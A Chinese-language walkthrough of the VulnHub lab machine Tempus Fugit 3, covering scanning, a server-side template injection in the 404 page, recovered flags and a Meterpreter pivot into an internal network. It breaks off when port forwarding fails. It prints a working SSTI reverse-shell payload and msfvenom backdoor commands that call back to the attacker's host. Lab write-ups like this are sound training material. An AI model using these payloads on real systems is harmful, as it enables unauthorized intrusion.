Vulnhub-Tempus-Fugit-3
信息搜集
1 | arp-scan -l |
扫描一下端口
!!!怎么80没有开,访问网站也是访问不了不知道哪里出了问题。这里又换了成了VirtualBox打开,再扫一次
后来又摸索了一下,发现是kali在nat模式,在桥接模式下的配置没有配好,桥接网卡选择本机的无线网卡就可以了。也是
扫一下目录
1 | gobuster dir -u http://192.168.141.109 -w medium.txt -x php,txt,zip,html |
漏洞利用
访问/login,/logout都会重定向到首页,抓包看一下
啥也没有,就是写一个重定向,这里设计得很巧妙啊,没想到是在报错页面存在一个ssti,404页面抓个包
然后就是反弹shell
1 | {{request.application.__globals__.__builtins__.__import__('os').popen("bash -c 'bash -i >& /dev/tcp/192.168.141.112/4444 0>&1'").read()}} |
反弹成功之后接下来开始搜集信息,先看一下app.py
主要信息有
1 | app.secret_key = 'RmxhZzF7IEltcG9ydGFudCBmaW5kaW5ncyB9' --->Flag1{ Important findings } base64解码 |
接下来交互数据库获取信息
1 | sqlcipher db2.db --interactice |
1 | RmxhZzN7IEhleSwgcmVhZGluZyBzZWNyZXRzICB9 -->Flag3{ Hey, reading secrets } |
有了用户名和密码就可以登入了
这里有隐藏的flag Flag2{ Is this the foothold I have been looking for?}
接下来继续分析,发现没有ip -a,ifcogfig等命令,使用
1 | hostname -i |
接下里就是内网渗透了,由于环境限制没有办法使用工具扫描网段,且靶机不存在wget,curl等工具没把发下在工具,这个时候使用msf生成一个后门程序
1 | msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.141.112 LPORT=7777 -f elf -o ex.elf |
将后门程序以base64文本传输,
1 | cat ex.elf| base64 -w0 |
由于权限问题要把后门写进/tmp目录
增加一个权限
1 | chmod +x ex.elf |
然后在msf配置一下参数
1 | use exploit/multi/handler |
配置好之后run开始监听,另一边靶机运行后门程序
1 | ./ex.elf |
接下来就是上传扫描工具了,这里上传的是fscan,
把kali本机的fscan上传到靶机上,然后给一个执行权限
1 | chmod +x fscan |
上传之后就可以扫描靶机的c段
这里报错是因为本机编译出来的 fscan 是在高版本系统编译,依赖 GLIBC 2.32、2.34,而这台靶机 Linux 系统自带的 glibc 版本更低,动态链接版本不匹配,运行时直接拒绝加载库文件。
解决方案
在本机的fscan目录下
1 | CGO_ENABLED=0 go build -ldflags "-s -w -extldflags '-static'" -o fscan_static main_cli.go |
静态编译,打包全部依赖,不依赖系统glibc
把重新生成的fscan_static传到靶机执行即可
有两个存活主机192.168.100.1``192.16.100.100
其中192.168.100.1:443指纹识别为Apache/2.4.38(Debian),ProcessWire CMS,下一步就是访问这个服务,但是由于这是在内网没有办法直接访问,可以依靠现有 Meterpreter 会话做流量中转。
回到meterpreter会话
1 | portfwd add -l 8443 -p 443 -r 192.168.100.1 |
然后这个端口就出问题了,没办法进行后续操作了





















